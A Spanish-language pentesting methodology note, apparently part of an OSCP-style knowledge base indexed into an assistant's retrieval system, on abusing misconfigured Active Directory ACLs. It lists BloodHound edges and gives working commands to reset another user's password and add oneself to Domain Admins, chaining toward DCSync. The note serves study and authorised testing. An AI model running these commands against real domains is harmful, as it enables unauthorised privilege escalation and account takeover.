JARVIS/nucleo/saber/conocimiento/05 - Active Directory/ACL abuses.md
sito 7e06ce46cf saber: pack de metodologia publico (conocimiento/) + doc del RAG
El repo trae ahora ~73 docs de metodologia de pentesting (estilo OSCP,
scrubeados de datos personales) que indexa.py indexa: un clon recien hecho ya
sabe de enumeracion, explotacion web, shells, privesc, Active Directory,
cracking... con los comandos, sin ningun dato privado. docs/rag.md lo refleja.
2026-08-16 17:58:41 +02:00

25 lines
981 B
Markdown

# ACL abuses
> Permisos mal configurados sobre objetos de AD que te dejan escalar. **BloodHound te los pinta** como aristas. Camino de Active Directory.
## Las aristas peligrosas
```
GenericAll → control total sobre el objeto
WriteDACL → te das a ti mismo cualquier permiso
AddMember → te metes en un grupo (ej. Domain Admins)
ForceChangePassword → cambias la pass de otro usuario sin saber la actual
GenericWrite → modificar atributos (ej. añadir SPN → Kerberoasting dirigido)
```
## Explotación típica (con bloodyAD / PowerView / impacket)
```bash
# ForceChangePassword:
net rpc password "victima" "NuevaPass123!" -U "dominio/yo%mipass" -S DC_IP
# AddMember a un grupo:
bloodyAD -d corp.local -u yo -p pass --host DC add groupMember "Domain Admins" yo
```
## Encadenado
Una arista lleva a otra → BloodHound calcula el **camino** hasta Domain Admins → puede acabar en DCSync.
Relacionado: BloodHound · LAPS · OSCP MOC